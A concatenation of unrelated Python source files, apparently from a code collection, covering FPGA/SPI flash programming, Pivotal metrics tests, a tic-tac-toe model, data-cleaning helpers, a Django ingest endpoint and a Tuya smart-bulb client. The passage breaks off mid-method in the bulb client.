                        <IOState>HighZ</IOState>
                        <PreloadLength>362</PreloadLength>
                        <IOVectorData>0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF</IOVectorData>
                        <AccessMode>Direct Programming</AccessMode>
                    </Option>
                </Device>
            </CPLDDevice>
            <FlashDevice>
                <Device>
                    <Pos>1</Pos>
                    <Vendor>Macronix</Vendor>
                    <Family>SPI Serial Flash</Family>
                    <Name>MX25L12833F</Name>
                    <IDCode>0x18</IDCode>
                    <Package>8-pin SOP</Package>
                    <Operation>Erase,Program,Verify</Operation>
                    <File>{bitstream_file}</File>
                    <AddressBase>0x00000000</AddressBase>
                    <EndAddress>0x000F0000</EndAddress>
                    <DeviceSize>128</DeviceSize>
                    <DataSize>1016029</DataSize>
                    <NumberOfDevices>1</NumberOfDevices>
                    <ReInitialize value="FALSE"/>
                </Device>
            </FlashDevice>
            <FPGADevice>
                <Device>
                    <Pos>1</Pos>
                    <Name></Name>
                    <File>{bitstream_file}</File>
                    <LocalChainList>
                        <LocalDevice index="-99"
                            name="Unknown"
                            file="{bitstream_file}"/>
                    </LocalChainList>
                    <Option>
                        <SVFVendor>JTAG STANDARD</SVFVendor>
                    </Option>
                </Device>
            </FPGADevice>
            </FPGALoader>
        </Device>
    </Chain>
    <ProjectOptions>
        <Program>SEQUENTIAL</Program>
        <Process>ENTIRED CHAIN</Process>
        <OperationOverride>No Override</OperationOverride>
        <StartTAP>TLR</StartTAP>
        <EndTAP>TLR</EndTAP>
        <DisableCheckBoard value="TRUE"/>
        <VerifyUsercode value="FALSE"/>
        <TCKDelay>3</TCKDelay>
    </ProjectOptions>
    <CableOptions>
        <CableName>USB2</CableName>
        <PortAdd>FTUSB-0</PortAdd>
        <USBID>Lattice CrossLink-NX Eval Board A Location 0000 Serial FT4J4IK9A</USBID>
    </CableOptions>
</ispXCF>
"""
        if mode == "direct":
            xcf_template = xcf_template_direct
        if mode == "flash":
            xcf_template = xcf_template_flash

        return LatticeProgrammer(xcf_template)
|
from datetime import datetime, timedelta
import pytest
from app.source import get_datetime, get_process_cycle_efficiency
from app.source.pivotal import Pivotal
def mock_pivotal_client(
    mocker, project_info=None, iterations=None,
    story_started="2018-11-01T12:00:00Z", stories=None,
    story_blockers=None, story_activities=None
):
    """Install an in-memory PivotalClient fake for app.source.pivotal.

    Keyword arguments override the canned project, iteration, story, blocker
    and activity payloads.

    Bug fix: the defaults used to be shared mutable objects ({} / []) and one
    of them was mutated in place (story_activities[1] = ...), so the mutated
    default leaked into every subsequent call. None sentinels are used now;
    explicitly passing {} / [] still selects the canned defaults, as before.
    """
    mocker.patch("os.environ", {
        'TM_PIVOTAL_PAT': 'test_pat',
        'TM_PIVOTAL_PROJECT_ID': 'test_project_id',
    })

    if not project_info:
        project_info = {
            'iteration_length': 1,
            'current_iteration_number': 3
        }

    # Resolve stories before iterations so the default iteration embeds the
    # resolved story list (the old ordering captured a stale empty list).
    if not stories:
        stories = [
            {
                "id": 1,
                "current_state": "accepted",
                "name": "test",
                "accepted_at": "2018-11-01T12:00:00Z",
            }
        ]

    if not iterations:
        iterations = [
            {
                "number": "1",
                "start": "2018-11-01T12:00:00Z",
                "finish": "2018-11-15T12:00:00Z",
                "stories": stories
            }
        ]

    if story_blockers is None:
        story_blockers = []

    if not story_activities:
        story_activities = {
            1: [
                {
                    'highlight': 'started',
                    'changes': [
                        {
                            'kind': 'story',
                            'new_values': {
                                'updated_at': story_started
                            }
                        }
                    ],
                }
            ]
        }

    class MockPivotalClient:
        def __init__(self, _, project_id=''):
            self.project_id = project_id

        def get_project(self):
            return project_info

        def get_project_iterations(self, offset=1, limit=10):
            return iterations

        def get_story_blockers(self, story_id):
            # Return the full blocker list when any blocker targets this story.
            for blocker in story_blockers:
                if blocker['story_id'] == story_id:
                    return story_blockers
            return []

        def get_story_activities(self, story_id):
            return story_activities.get(story_id)

    mocker.patch("app.source.pivotal.PivotalClient", MockPivotalClient)
def test_get_blocked_time(mocker):
    """A resolved blocker's duration is reported as the story's blocked time."""
    accepted_story = {
        "id": 1,
        "current_state": "accepted",
        "name": "test",
        "created_at": "2018-11-01T12:00:00Z",
        "accepted_at": "2018-11-02T12:00:00Z",
    }
    resolved_blocker = {
        "story_id": 1,
        "resolved": True,
        "created_at": "2018-11-01T12:00:00Z",
        "updated_at": "2018-11-02T12:00:00Z",
    }
    mock_pivotal_client(
        mocker, stories=[accepted_story], story_blockers=[resolved_blocker]
    )
    assert Pivotal().get_blocked_time(accepted_story["id"]) == timedelta(days=1)
def test_get_blocked_time_unresolved_is_none(mocker):
    """An unresolved blocker means blocked time cannot be computed yet."""
    started_story = {
        "id": 1,
        "current_state": "started",
        "name": "test",
        "created_at": "2018-11-01T12:00:00Z",
    }
    open_blocker = {
        "story_id": 1,
        "resolved": False,
        "created_at": "2018-11-01T12:00:00Z",
        "updated_at": "2018-11-02T12:00:00Z",
    }
    mock_pivotal_client(
        mocker, stories=[started_story], story_blockers=[open_blocker]
    )
    # NOTE(review): the whole story dict is passed here, while the test above
    # passes story["id"] — confirm which form get_blocked_time expects.
    assert Pivotal().get_blocked_time(started_story) is None
def test_pvotal_get_metrics(mocker):
    """A single accepted story yields one metric with weekend-adjusted cycle time."""
    started = "2018-11-01T12:00:00Z"
    accepted = "2018-11-05T12:00:00Z"
    mock_pivotal_client(
        mocker,
        story_started=started,
        stories=[
            {
                "id": 1,
                "current_state": "accepted",
                "name": "test",
                "accepted_at": accepted,
            }
        ],
    )

    metrics = Pivotal().get_metrics()

    # subtract 2 days as there is a weekend between start and accepted
    expected_cycle = (
        get_datetime(accepted) - get_datetime(started) - timedelta(days=2)
    ).total_seconds()
    assert len(metrics) == 1
    assert metrics[0].avg_cycle_time == expected_cycle
    assert metrics[0].process_cycle_efficiency == 1
def test_get_pivotal_metrics_with_story_blocker(mocker):
    """A resolved blocker reduces process cycle efficiency accordingly."""
    started = "2018-11-01T12:00:00Z"
    accepted = "2018-11-05T12:00:00Z"
    blocked_from = "2018-11-01T12:00:00Z"
    blocked_until = "2018-11-02T12:00:00Z"
    mock_pivotal_client(
        mocker,
        stories=[
            {
                "id": 1,
                "current_state": "accepted",
                "name": "test",
                "accepted_at": accepted,
            }
        ],
        story_blockers=[
            {
                "story_id": 1,
                "resolved": True,
                "created_at": blocked_from,
                "updated_at": blocked_until,
            }
        ],
    )

    metrics = Pivotal().get_metrics()

    # weekend between start and acceptance is excluded from the cycle
    cycle = get_datetime(accepted) - get_datetime(started) - timedelta(days=2)
    assert len(metrics) == 1
    assert metrics[0].avg_cycle_time == cycle.total_seconds()
    assert metrics[0].process_cycle_efficiency == (
        (get_datetime(blocked_until) - get_datetime(blocked_from)) / cycle
    )
    assert metrics[0].num_incomplete == 0
def test_get_pivotal_metrics_with_story_blocker_unresolved(mocker):
    """An unresolved blocker leaves its story incomplete without hurting PCE."""
    started = "2018-11-01T12:00:00Z"
    accepted = "2018-11-07T12:00:00Z"
    mock_pivotal_client(
        mocker,
        story_started=started,
        stories=[
            {
                "id": 1,
                "current_state": "accepted",
                "name": "test",
                "accepted_at": accepted,
            },
            {
                "id": 2,
                "current_state": "started",
                "name": "test 2",
            },
        ],
        story_blockers=[
            {
                "story_id": 2,
                "resolved": False,
                "created_at": "2018-11-05T12:00:00Z",
            }
        ],
    )

    metrics = Pivotal().get_metrics()

    expected_cycle = (
        get_datetime(accepted) - get_datetime(started) - timedelta(days=2)
    ).total_seconds()
    assert len(metrics) == 1
    assert metrics[0].avg_cycle_time == expected_cycle
    assert metrics[0].process_cycle_efficiency == 1
    assert metrics[0].num_incomplete == 1
|
import json

# Sort each planet's moon list by orbital distance and rewrite the data
# file in place with 4-space JSON indentation.
with open('data/moon-data.json', 'r') as source:
    planets = json.load(source)

for planet in planets:
    planet['moons'].sort(key=lambda moon: moon['orbit'])

with open('data/moon-data.json', 'w') as destination:
    destination.write(json.dumps(planets, indent=4))
|
"""
Date: 2022.05.19 14:30:18
LastEditors: Rustle Karl
LastEditTime: 2022.05.20 10:20:18
"""
import traceback
def another_function():
    """Intermediate frame so the stack dump shows a nested call chain."""
    lumberstack()
def lumberstack():
    """Dump the current call stack three ways: printed directly,
    as extracted FrameSummary objects, and as formatted strings."""
    divider = "-" * 60
    print(divider)
    traceback.print_stack()
    print(divider)
    print(repr(traceback.extract_stack()))
    print(divider)
    print(repr(traceback.format_stack()))
    print(divider)
# Demo entry point: trigger the stack dump from a nested call frame.
another_function()
|
from collections import namedtuple
from dataclasses import dataclass
from enum import Enum
from typing import Any, Dict, List, Optional, Sequence, Tuple
from uuid import UUID
from pydantic import BaseModel, validator
# Board dimension limits (inclusive).
MIN_GRID_WIDTH = 3
MIN_GRID_HEIGHT = 3
MAX_GRID_WIDTH = 10
MAX_GRID_HEIGHT = 10
# Smallest number of aligned cells that can count as a win.
MIN_WINNING_LINE = 3
@dataclass
class Player:
    """A game participant, identified solely by UUID."""
    uuid: UUID
# Immutable 2-D board coordinate; hashable, so usable as a dict key.
Cell = namedtuple("Cell", ["x", "y"])
class CellValue(Enum):
    """Contents of a single grid cell."""
    EMPTY = "empty"
    X = "X"
    O = "O"
class Grid(BaseModel):
    """Rectangular board mapping every Cell coordinate to a CellValue."""

    cells: Dict[Cell, CellValue]
    width: int
    height: int

    @validator("cells")
    def validate_cells(
        cls, cells: Dict[Cell, CellValue], values: Dict[str, Any]
    ) -> Dict[Cell, CellValue]:
        """Reject any cell coordinate outside the width x height bounds."""
        width = values["width"]
        height = values["height"]
        for cell in cells:
            if not (0 <= cell.x < width) or not (0 <= cell.y < height):
                raise ValueError("Cell position is out of range")
        return cells

    def set_value(self, cell: Cell, value: CellValue) -> None:
        """Write ``value`` into ``cell``."""
        self.cells[cell] = value

    def get_value(self, cell: Cell) -> CellValue:
        """Read the value stored at ``cell``."""
        return self.cells[cell]

    def get_winning_line(self, winning_line_length: int) -> Optional[Sequence[Cell]]:
        """Return the first run of ``winning_line_length`` equal, non-empty
        cells (vertical, horizontal, or either diagonal), or None.
        """
        assert winning_line_length >= MIN_WINNING_LINE
        for x in range(self.width):
            for y in range(self.height):
                # Directions: down, right, up-right diagonal, down-right diagonal.
                for shift_x, shift_y in [
                    (0, 1),
                    (1, 0),
                    (1, -1),
                    (1, 1),
                ]:
                    cells_to_check = [
                        Cell(x + shift_x * d, y + shift_y * d)
                        for d in range(winning_line_length)
                    ]
                    # Skip runs that leave the board.
                    if not all(
                        0 <= cell.x < self.width and 0 <= cell.y < self.height
                        for cell in cells_to_check
                    ):
                        continue
                    first = self.cells[cells_to_check[0]]
                    # BUG FIX: a run of EMPTY cells used to count as a win,
                    # so a fresh board was immediately "won".
                    if first is CellValue.EMPTY:
                        continue
                    if all(self.cells[cell] is first for cell in cells_to_check):
                        return cells_to_check
        return None
class State:
    """Mutable game state for an m,n,k-style tic-tac-toe game.

    Lifecycle: construct, ``set_players`` (exactly two), ``set_player_to_start``,
    then alternate ``move`` calls until the game is finished.
    """

    def __init__(self, grid_size: Tuple[int, int], winning_line: int) -> None:
        self._players: List[UUID] = []
        self._player_to_start: Optional[UUID] = None
        self._player_to_move: Optional[UUID] = None
        self._finished = False
        self._winner: Optional[UUID] = None

        width, height = grid_size
        assert MIN_GRID_WIDTH <= width <= MAX_GRID_WIDTH
        assert MIN_GRID_HEIGHT <= height <= MAX_GRID_HEIGHT
        # BUG FIX: was `< max(grid_size)`, which rejected e.g. the classic
        # 3x3 board with a 3-in-a-row winning line.
        assert MIN_WINNING_LINE <= winning_line <= max(grid_size)

        self._grid = Grid(
            width=width,
            height=height,
            cells={
                Cell(x=x, y=y): CellValue.EMPTY
                for x in range(width)
                for y in range(height)
            },
        )
        self._winning_line = winning_line

    @property
    def winner(self) -> Optional[UUID]:
        """UUID of the winning player, or None while undecided."""
        return self._winner

    @property
    def finished(self) -> bool:
        """True once a winning line has been detected."""
        return self._finished

    @property
    def winning_line(self) -> Optional[Sequence[Cell]]:
        """The winning run of cells, or None if there is none yet."""
        return self._grid.get_winning_line(self._winning_line)

    def _check_win(self) -> bool:
        """Detect a win, record the winner, and return whether one occurred."""
        winning_line = self._grid.get_winning_line(self._winning_line)
        if winning_line is not None:
            self._finished = True
            winning_value = self._grid.get_value(winning_line[0])
            if winning_value == self.get_player_value(self._players[0]):
                self._winner = self._players[0]
            else:
                self._winner = self._players[1]
            return True
        return False

    def get_player_value(self, player_uuid: UUID) -> CellValue:
        """Return the mark (X/O) of a registered player; starter plays X."""
        if player_uuid not in self._players:
            # TODO: dedicated exception type
            raise ValueError()
        return CellValue.X if player_uuid == self._player_to_start else CellValue.O

    def set_players(self, players: Sequence[UUID]) -> None:
        """Register exactly two players."""
        if len(players) != 2:
            # TODO: dedicated exception type
            raise ValueError()
        self._players = players

    def set_player_to_start(self, player_to_start: UUID) -> None:
        """Choose which registered player starts (and therefore plays X)."""
        if player_to_start not in self._players:
            # TODO: dedicated exception type
            raise ValueError()
        self._player_to_start = player_to_start
        # BUG FIX: the starter is also the first to move; without this,
        # _player_to_move stayed None and every move() raised.
        self._player_to_move = player_to_start

    def move(self, player_uuid: UUID, cell: Cell) -> None:
        """Place the moving player's mark in ``cell`` and advance the turn."""
        if self.finished:
            # TODO: dedicated exception type
            raise ValueError()
        if self._player_to_move != player_uuid:
            # TODO: dedicated exception type
            raise ValueError()
        self._grid.set_value(cell, self.get_player_value(player_uuid))
        # Alternate turns between the two registered players.
        if self._player_to_move == self._players[0]:
            self._player_to_move = self._players[1]
        else:
            self._player_to_move = self._players[0]
        self._check_win()
|
#!/usr/bin/env python
#
# This file is part of GreatFET
#
"""
Utility for flashing the onboard SPI flash on GreatFET boards.
"""
from __future__ import print_function
import os
import sys
import time
import errno
import argparse
import subprocess
import usb
from greatfet import GreatFET
from greatfet.errors import DeviceNotFoundError
from greatfet.utils import log_silent, log_verbose
# The serial number expected from the DFU flash stub.
DFU_STUB_SERIAL = "dfu_flash_stub"
# Filename of the flash-stub image searched for in DFU_STUB_PATHS.
DFU_STUB_NAME = 'flash_stub.dfu'
# Candidate user-local data directories that may contain the stub.
DFU_STUB_PATHS = [ '~/.local/share/greatfet', '~/.local/share/GreatFET' ]

# Vendor VID/PID if the device is in DFU.
NXP_DFU_VID = 0x1fc9
NXP_DFU_PID = 0x000c

# Maximum length to allow, for now.
MAX_FLASH_LENGTH = 0x100000
def spi_flash_read(device, filename, address, length, log_function=log_silent):
    """Reads the data from the device's SPI flash to a file. """

    def report(bytes_read, bytes_total):
        # \r keeps the progress line in place on the terminal.
        log_function("Read {} bytes of {}.".format(bytes_read, bytes_total), end='\r')

    # Pull the requested window of flash and stream it to disk.
    with open(filename, 'wb') as output_file:
        contents = device.onboard_flash.read(
            address, length, progress_callback=report)
        contents.tofile(output_file)
    log_function('')
def spi_flash_write(device, filename, address, log_function=log_silent):
    """Writes the data from a given file to the SPI flash."""

    def report(bytes_written, bytes_total):
        # \r keeps the progress line in place on the terminal.
        log_function("Written {} bytes of {}.".format(bytes_written, bytes_total), end='\r')

    # Load the image and push it to flash, erasing the target region first.
    with open(filename, 'rb') as input_file:
        payload = input_file.read()
    device.onboard_flash.write(
        payload, address, erase_first=True, progress_callback=report)
    log_function('')
def find_dfu_stub(args):
    """ Finds the DFU stub.

    :param args: parsed argparse namespace; ``args.dfu_stub`` may name an
        explicit stub file to prefer.
    :return: path to the stub binary, or None when it cannot be found
    """

    # FIXME: This should be cleaned up to search paths that make sense given
    # where and how we might install GreatFET.

    # If we have an explicit DFU stub location, use it.
    if args.dfu_stub:
        path = os.path.expanduser(args.dfu_stub)
        if os.path.isfile(path):
            return path

    # Otherwise, search each of the paths around.
    # BUG FIX: dropped a stray debugging print of every candidate path.
    for path in DFU_STUB_PATHS:
        filename = os.path.expanduser(os.path.join(path, DFU_STUB_NAME))
        if os.path.isfile(filename):
            return filename

    # If we weren't able to find it, give up, for now.
    # TODO: eventually ship this with the GreatFET distribution and/or
    # download it on demand?
    return None
def load_dfu_stub(args):
    """ Loads a DFU programming stub onto a GreatFET in DFU mode.

    :param args: parsed argparse namespace (used to locate the stub)
    :raise DeviceNotFoundError: if no NXP DFU-mode device is attached
    :raise ValueError: if the DFU stub image cannot be located
    :raise IOError: if dfu-util exits with a non-zero status
    """

    # First: check to make sure we _have_ a DFU'able device.
    dev = usb.core.find(idVendor=NXP_DFU_VID, idProduct=NXP_DFU_PID)
    if not dev:
        raise DeviceNotFoundError
    del dev

    # If we have a DFU'able device, find the DFU stub and load it.
    stub_path = find_dfu_stub(args)
    if stub_path is None:
        raise ValueError("Could not find the DFU stub!")

    #
    # FIXME: This isn't a good way to do things. It's being stubbed in
    # for now, but it'd be better to talk DFU from python directly.
    #
    # BUG FIX: dfu-util expects a single "vid:pid" argument after --device;
    # the VID and PID were previously passed as two separate arguments.
    device_spec = "{:x}:{:x}".format(NXP_DFU_VID, NXP_DFU_PID)
    rc = subprocess.call(['dfu-util', '--device', device_spec,
                          '--alt', '0', '--download', stub_path])
    if rc:
        raise IOError("Error using DFU-util!")
def find_greatfet(args):
    """ Finds a GreatFET matching the relevant arguments.

    Selection order: the DFU stub's serial when --dfu is set, else a
    positional --index (when non-zero), else --serial (or the first
    device when no serial was given).

    :param args: parsed argparse namespace (dfu, index, serial)
    :return: a connected GreatFET instance
    :raise DeviceNotFoundError: if no matching device is attached
    """

    # If we're prorgamming via DFU mode, look for a device that sports the DFU stub.
    # Note that we only support a single DFU-mode device for now.
    if args.dfu:
        return GreatFET(serial_number=DFU_STUB_SERIAL)

    # If we have an index argument, grab _all_ greatFETs and select by index.
    elif args.index:
        # NOTE(review): `--index 0` is falsy and falls through to the serial
        # branch below — confirm that treating 0 as "unset" is intended.

        # Find _all_ GreatFETs...
        devices = GreatFET(find_all=True)

        # ... and then select the one with the provided index.
        if len(devices) <= args.index:
            raise DeviceNotFoundError
        return devices[args.index]

    # If we have a serial number, look only for a single device. Theoretically,
    # we should never have more than one GreatFET with the same serial number.
    # Technically, this is violable, but libusb doesn't properly handle searching
    # by serial number if there are multiple devices with the same one, so we
    # enforce this.
    else:
        return GreatFET(serial_number=args.serial)
def main():
    """Command-line entry point: parse arguments, locate a GreatFET, and
    perform the requested SPI-flash write/read/reset operations (in that
    order, matching hackrf_spiflash behaviour)."""

    # Set up a simple argument parser.
    parser = argparse.ArgumentParser(
        description="Utility for flashing the GreatFET's onboard SPI flash")
    parser.add_argument('-a', '--address', metavar='<n>', type=int,
                        help="starting address (default: 0)", default=0)
    parser.add_argument('-l', '--length', metavar='<n>', type=int,
                        help="number of bytes to read (default: {})".format(MAX_FLASH_LENGTH),
                        default=MAX_FLASH_LENGTH)
    parser.add_argument('-r', '--read', dest='read', metavar='<filename>', type=str,
                        help="Read data into file", default='')
    parser.add_argument('-w', '--write', dest='write', metavar='<filename>', type=str,
                        help="Write data from file", default='')
    parser.add_argument('-s', '--serial', dest='serial', metavar='<serialnumber>', type=str,
                        help="Serial number of device, if multiple devices", default=None)
    parser.add_argument('-i', '--index', dest='index', metavar='<i>', type=int,
                        help="number of the attached device (default: 0)", default=0)
    parser.add_argument('-q', '--quiet', dest='quiet', action='store_true',
                        help="Suppress messages to stdout")
    parser.add_argument('-R', '--reset', dest='reset', action='store_true',
                        help="Reset GreatFET after performing other operations.")
    parser.add_argument('--wait', dest='wait', action='store_true',
                        help="Wait for a GreatFET device to come online if none is found.")
    parser.add_argument('-d', '--dfu', dest='dfu', action='store_true',
                        help="Flash a device from DFU mode by first loading a stub. Always resets.")
    parser.add_argument('--dfu-stub', dest='dfu_stub', metavar='<stub.dfu>', type=str,
                        help="The stub to use for DFU programming. If not provided, the utility will attempt to automtaically find one.")
    args = parser.parse_args()

    # Validate our options.

    # If we don't have an option, print our usage.
    if not any((args.read, args.write, args.reset,)):
        parser.print_help()
        sys.exit(0)

    # Determine whether we're going to log to the stdout, or not at all.
    log_function = log_silent if args.quiet else log_verbose

    # If we're supposed to install firmware via a DFU stub, install it first.
    if args.dfu:
        try:
            load_dfu_stub(args)
        except DeviceNotFoundError:
            print("Couldn't find a GreatFET-compatible board in DFU mode!", file=sys.stderr)
            sys.exit(errno.ENODEV)

    # Create our GreatFET connection.
    log_function("Trying to find a GreatFET device...")
    device = None
    # Poll until a device appears: after a DFU stub load the board needs
    # time to re-enumerate, and --wait waits for one to be plugged in.
    while device is None:
        try:
            device = find_greatfet(args)
            log_function("{} found. (Serial number: {})".format(device.board_name(), device.serial_number()))
        except DeviceNotFoundError:

            # If we're not in wait mode (or waiting for a DFU flash stub to come up), bail out.
            if not (args.dfu or args.wait):
                if args.serial:
                    print("No GreatFET board found matching serial '{}'.".format(args.serial), file=sys.stderr)
                elif args.index:
                    print("No GreatFET board found with index '{}'.".format(args.index), file=sys.stderr)
                else:
                    print("No GreatFET board found!", file=sys.stderr)
                sys.exit(errno.ENODEV)
            else:
                time.sleep(1)

    # Ensure that the device supports an onboard SPI flash.
    try:
        device.onboard_flash
    except AttributeError:
        print("The attached GreatFET ({}) doesn't appear to have an SPI flash to program!".format(device.board_name()), file=sys.stderr)
        sys.exit(errno.ENOSYS)

    # If we have a write command, write first, to match the behavior of hackrf_spiflash.
    if args.write:
        log_function("Writing data to SPI flash...")
        spi_flash_write(device, args.write, args.address, log_function)
        log_function("Write complete!")
        if not (args.reset or args.dfu):
            log_function("Reset not specified; new firmware will not start until next reset.")

    # Handle any read commands.
    if args.read:
        log_function("Reading data from SPI flash...")
        spi_flash_read(device, args.read, args.address, args.length, log_function)
        log_function("Read complete!")

    # Finally, reset the target
    if args.reset or args.dfu:
        log_function("Resetting GreatFET...")
        device.reset(reconnect=False)
        log_function("Reset complete!")
# Allow use both as an importable module and as a command-line tool.
if __name__ == '__main__':
    main()
|
import numpy as np
import h5py
def save_to_h5(output_filepath, col_name, dataset, expand=True):
    """Append `dataset` to the resizable HDF5 dataset `col_name`,
    creating it (with an unlimited first axis) on first use.

    :param output_filepath: HDF5 file, opened in append mode
    :param col_name: dataset name within the file
    :param dataset: array-like payload to append
    :param expand: prepend a length-1 axis so the payload is one "row"
    """
    if expand:
        dataset = np.expand_dims(dataset, axis=0)
    # convert float64 to float32 to save space
    if dataset.dtype == 'float64':
        dataset = dataset.astype('float32')

    with h5py.File(output_filepath, 'a') as hf:
        if col_name in hf:
            existing = hf[col_name]
            existing.resize(existing.shape[0] + dataset.shape[0], axis=0)
            existing[-dataset.shape[0]:] = dataset
        else:
            max_shape = (None, ) + dataset.shape[1:] if dataset.ndim > 1 else (None, )
            hf.create_dataset(col_name, data=dataset, maxshape=max_shape)
|
from c0101_retrieve_ref import retrieve_ref
from c0102_build_path import build_path
from c0103_save_meta import save_meta
from c0104_retrieve_meta import retrieve_meta
from c0105_record_to_summary import record_to_summary
import os
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
def clean_save():
    """
    For each record in every study, load the coregistered 'All' segment
    for each sensor, rebase its time axis to start at zero, drop pandas
    index artifacts, and save the result under the 'clean' format tree.
    """

    print("begin clean_save")

    study_list = retrieve_ref('study_list')
    sensor_list = retrieve_ref('sensor_list')
    # NOTE(review): segment_list is retrieved but never used — confirm and remove.
    segment_list = retrieve_ref('segment_list')

    # check each study
    for study in study_list:

        df_meta = retrieve_meta(study)
        recordNames = list(df_meta['recordName'])

        for record in recordNames:

            # metadata row index for this record (logged for traceability)
            i = df_meta[ df_meta['recordName']== record].index.values[0]
            print('i = ' + str(i))

            for sensor in sensor_list:

                # source: the coregistered full-record ('All') csv for this sensor
                format_type, segment = 'coregister', 'All'
                source = os.path.join('studies', study, 'formatted', format_type, record, segment, sensor + '.csv')
                df = pd.read_csv(source)
                # rebase the time axis so the record starts at minute 0
                df = reset_minutes(segment, df)

                # drop 'Unnamed: *' columns left behind by prior to_csv round-trips
                for colName in list(df.head()):
                    if 'Unnamed' in colName:
                        del df[colName]

                # destination: mirror of the source path under the 'clean' tree
                format_type = 'clean'
                path = ['studies', study, 'formatted', format_type, record, segment]
                path = build_path(path)
                file = os.path.join(path, sensor + ".csv")
                df.to_csv(file)
                print('formatted clean file = ' + str(file))
def reset_minutes(segment, df):
    """Shift the 'timeMinutes' column so the first sample is at minute 0.

    :param segment: segment label (unused; kept for call-site compatibility)
    :param df: DataFrame with a 'timeMinutes' column
    :return: the same DataFrame with 'timeMinutes' rebased to start at 0
    """
    # CLEANUP: removed three retrieve_ref() config reads whose results were
    # never used, and replaced the manual accumulation loop.
    original = list(df['timeMinutes'])
    if original:
        start = original[0]
        df['timeMinutes'] = [t - start for t in original]
    return df
|
from rest_framework.parsers import FormParser
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework.permissions import IsAuthenticated
from django.http import HttpResponse
import subprocess
import re
import os
class Track(APIView):
    """Ingest an uploaded bigWig file into higlass-server as a tileset.

    POST fields: ``uid`` (a numeric id optionally followed by a strand
    suffix such as ``minusstrand``/``plusstrand``) and ``genome`` (the
    coordinate system name).
    """

    permission_classes = (IsAuthenticated,)
    parser_classes = [FormParser]

    def post(self, request):
        try:
            uid = request.data['uid']
            genome = request.data['genome']

            # Split uid into its leading numeric id and the trailing
            # strand marker (empty when the uid is purely numeric).
            ID = re.split('[a-zA-Z.]+', uid)[0]
            tail = re.split('^[0-9]+', uid)[1].lower()

            suffix = ""
            if tail == 'minusstrand':
                suffix = 'MinusStrand'
            elif tail == 'plusstrand':
                suffix = 'PlusStrand'
            elif tail:
                # BUG FIX: the old check compared `suffix` against values it
                # could never hold, so unknown suffixes were silently accepted.
                return Response("Invalid uid")
        except (KeyError, IndexError):
            # Missing POST fields, or a uid without a leading number.
            # BUG FIX: HttpResponse(400) returned status 200 with body "400".
            return HttpResponse(status=400)

        # NOTE(review): unused — kept to preserve the env-var read; confirm
        # it can be removed.
        hostname = os.environ['MACHINE_HOSTNAME']

        completed = subprocess.run(
            ["python", "/home/higlass/projects/higlass-server/manage.py",
             "ingest_tileset", "--filename", uid + ".bw", "--no-upload",
             "--filetype", "bigwig", "--coordSystem", genome,
             "--uid", ID + suffix],
            stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
        return Response(completed.stdout)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import json
import colorsys
from ._tuya_api import _TuyaApi
from .exceptions import ModeNotSupported, FunctionNotSupported, ArgumentError
class Bulb(_TuyaApi):
    """
    Allows you to control the operation of your smart light bulb.

    :param client_id: your client id
    :param secret_key: your secret key
    :param region_key: your region key. Example: cn; us; eu; in
    :param device_id: your device id
    """

    def __init__(
        self, client_id: str, secret_key: str, region_key: str, device_id: str = None
    ):
        super().__init__(
            client_id=client_id, secret_key=secret_key, region_key=region_key
        )
        self._device_id = device_id

    @staticmethod
    def _should_check(check) -> bool:
        """
        Interpret a public ``check`` flag.

        Every ``check`` parameter documents "True == always check; set to
        False to skip", so ``None`` (the declared default in several
        methods) means True.

        BUG FIX: most set_* methods previously used ``if not check:``,
        which skipped the support check by default and ran it exactly when
        the caller asked to skip it (compare set_toggle, which was correct).
        """
        return check is not False

    def _function_exists(self, code_name: str, device_id: str) -> bool:
        """
        Check if a function exists on the device.

        :param code_name: function name
        :param device_id: device id
        :raise FunctionNotSupported: if function not supported
        :return: True when the device reports the function
        """
        try:
            for item in self.functions(device_id=device_id):
                if item["code"] == code_name:
                    return True
        except KeyError:
            # Malformed function entry — treat as unsupported, as before.
            pass
        raise FunctionNotSupported(target=code_name)

    def _available_values(self, code_name: str, device_id: str):
        """
        Get all available values for a function.

        :param code_name: function name
        :param device_id: device id
        :return: the function's ``values`` description (a JSON string for
            range-style functions such as work_mode)
        """
        values = [
            item["values"]
            for item in self.functions(device_id=device_id)
            if item["code"] == code_name
        ][0]
        return values

    def _template(
        self,
        value: int,
        code_name: str,
        device_id: str,
    ) -> dict:
        """
        Send a single-code command to the device.

        :param value: value to send under ``code_name``
        :param code_name: function code to set
        :param device_id: select device_id for this action only. tuya_bulb_control.Bulb(device_id) will be ignored
        :return: response dict
        """
        device_id = self._check_device_id(device_id)
        body = {"commands": [{"code": code_name, "value": value}]}
        response = self._post(postfix=f"/devices/{device_id}/commands", body=body)
        return response

    def _check_device_id(self, device_id: str) -> str:
        """
        Resolve the effective device id.

        :param device_id: device id, or None to use the instance default
        :return: current device id
        :raise ArgumentError: if both are empty
        """
        device_id = self._device_id if device_id is None else device_id
        if not device_id:
            raise ArgumentError(
                target=device_id, msg="Argument device_id must not be empty."
            )
        return device_id

    @staticmethod
    def _make_body(code_name: str, value) -> dict:
        """
        Build the request body for a single command.

        :param code_name: code name
        :param value: value
        :return: command body dict
        """
        return {
            "commands": [
                {
                    "code": code_name,
                    "value": value,
                }
            ]
        }

    def set_work_mode(
        self, mode_name: str, check: bool = True, device_id: str = None
    ) -> dict:
        """
        Select work mode.
        You can get a list of mods from tuya_bulb_control.Bulb.functions()

        Uses code: work_mode

        :param mode_name: mode name. For example: white; colour; scene; music
        :param check: check if your device supports this mode.
            Default: True == Always check. Set to False if you are sure the device supports the mode.
        :param device_id: select device_id for this action only. tuya_bulb_control.Bulb(device_id) will be ignored
        :raise FunctionNotSupported: if work mode isn't supported at all
        :raise ModeNotSupported: if the requested mode doesn't exist
        :return: response dict
        """
        code_name = "work_mode"
        device_id = self._check_device_id(device_id)

        if self._should_check(check):  # BUG FIX: flag was inverted
            self._function_exists(code_name=code_name, device_id=device_id)

        available_values = json.loads(
            self._available_values(code_name=code_name, device_id=device_id)
        )["range"]

        if mode_name not in available_values:
            raise ModeNotSupported(target=mode_name)

        body = self._make_body(code_name=code_name, value=mode_name)
        response = self._post(f"/devices/{device_id}/commands", body=body)
        return response

    def set_colour(self, rgb: tuple, check: bool = None, device_id: str = None) -> dict:
